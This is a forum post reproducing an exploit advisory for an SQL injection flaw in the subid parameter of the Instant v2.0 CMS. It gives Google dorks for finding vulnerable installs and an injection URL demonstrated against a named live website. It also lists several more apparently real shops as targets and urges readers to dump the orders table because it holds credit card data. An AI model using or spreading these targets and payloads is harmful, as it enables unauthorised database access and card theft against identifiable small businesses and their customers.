Aerosol Posted March 10, 2015 Report Posted March 10, 2015 ========================================================================================== Instant v2.0 SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Instant v2.0 SQL Injection Vulnerability : # Date : 10th March 2015 : # Author : X-Cisadane : # CMS Name : Instant v2.0 (another OverCoffee production) : # CMS Developer : overcoffee.com : # Version : 2.0 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125 : # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS. The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated subid Value. Attackers are able to read Database information by execution of own SQL commands. DORKS (How to find the target) : ================================ "Powered By Instant" inurl:/catalog/ inurl:/product_cat.php?subid= Or use your own Google Dorks Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/product_cat.php/subid=['SQLi] And you have to change the URL structure to http://[Site]/[Path]/product_cat.php?subid=['SQLi] Example : http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617 And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ... Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table PIC / PoC : http://i59.tinypic.com/4l0poh.png Another Vuln Sites : http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi] http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi] http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi] http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi] http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi] ... etc ...Source Quote